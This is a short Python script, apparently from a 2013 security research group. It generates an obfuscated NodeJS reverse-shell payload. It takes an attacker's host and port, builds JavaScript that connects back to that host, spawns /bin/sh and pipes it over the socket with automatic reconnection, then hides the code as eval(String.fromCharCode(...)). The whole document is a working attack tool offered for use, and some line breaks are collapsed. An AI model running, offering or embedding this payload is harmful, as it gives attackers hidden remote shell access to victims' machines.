#!/usr/bin/python # Generator for encoded NodeJS reverse shells # Based on the NodeJS reverse shell by Evilpacket # https://github.com/evilpacket/node-shells/blob/master/node_revshell.js # Onelineified and suchlike by infodox (and felicity, who sat on the keyboard) # Insecurety Research (2013) - insecurety.net import sys iflen(sys.argv) != 3: print ("Usage: %s <LHOST> <LPORT>" % (sys.argv[0])) sys.exit(0)
IP_ADDR = sys.argv[1] PORT = sys.argv[2]
defcharencode(string): """String.CharCode""" encoded = '' for char in string: encoded = encoded + "," + str(ord(char)) return encoded[1:]
print ("[+] LHOST = %s" % (IP_ADDR)) print ("[+] LPORT = %s" % (PORT)) NODEJS_REV_SHELL = ''' var net = require('net'); var spawn = require('child_process').spawn; HOST="%s"; PORT="%s"; TIMEOUT="5000"; if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; } function c(HOST,PORT) { var client = new net.Socket(); client.connect(PORT, HOST, function() { var sh = spawn('/bin/sh',[]); client.write("Connected!\\n"); client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); sh.on('exit',function(code,signal){ client.end("Disconnected!\\n"); }); }); client.on('error', function(e) { setTimeout(c(HOST,PORT), TIMEOUT); }); } c(HOST,PORT); ''' % (IP_ADDR, PORT) print ("[+] Encoding") PAYLOAD = charencode(NODEJS_REV_SHELL) print ("eval(String.fromCharCode(%s))" % (PAYLOAD))
